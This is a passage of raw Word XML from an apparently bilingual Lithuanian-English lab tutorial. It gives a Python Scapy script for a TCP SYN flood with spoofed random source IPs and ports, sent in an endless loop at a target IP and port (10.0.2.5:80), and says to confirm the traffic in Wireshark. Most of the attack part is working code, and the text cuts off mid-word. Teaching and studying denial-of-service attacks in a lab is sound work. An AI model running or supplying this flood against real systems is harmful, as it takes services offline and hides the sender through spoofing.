        <w:t>issiuntimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Send the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308CCD93" w14:textId="1537027D" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>packet, verbose=0)</w:t>
      </w:r>
      <w:r w:rsidR="001A5EFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
      <w:r w:rsidR="001A5EFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC351E5" w14:textId="4984F84B" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A323D" w14:textId="24F05990" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aukos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adresas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aukos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PORT’as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">** PORT 80 – TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>veikimo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port’as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">** PORT 53 – UDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>veikimo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port'as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67FDF2C2" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65039518" w14:textId="6CC60E45" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Atsidarote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paleidžiate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>skriptą</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jeigu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jums</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rodo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>protokolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pranešimus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vadinasi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>viską</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>atlikote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teisingai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8429C2" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B024CF2" w14:textId="2E38F760" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCAB47" w14:textId="39519564" w:rsidR="001A5EFA" w:rsidRPr="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">Create the file with </w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>touch TCPSYNFlood.py</w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve"> and edit it with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCPSYNFlood.p</w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106515F" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C9E54" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402B6E2" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072EE90D" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aukos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adresas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port'as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Set your target IP and Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF4F3F" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "10.0.2.5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397FEE37" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE29502" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B768C" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217FA66A" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Atsitiktinio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adreso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Porto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sugeneravimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Generate random source IP address and Port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FE3E9" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592" w:firstLine="195"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>".".join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>map(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str, (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>random.randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(0, 255) for _ in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4))))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>random.randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(1024, 65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17772C5A" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED2FD7" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paketo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
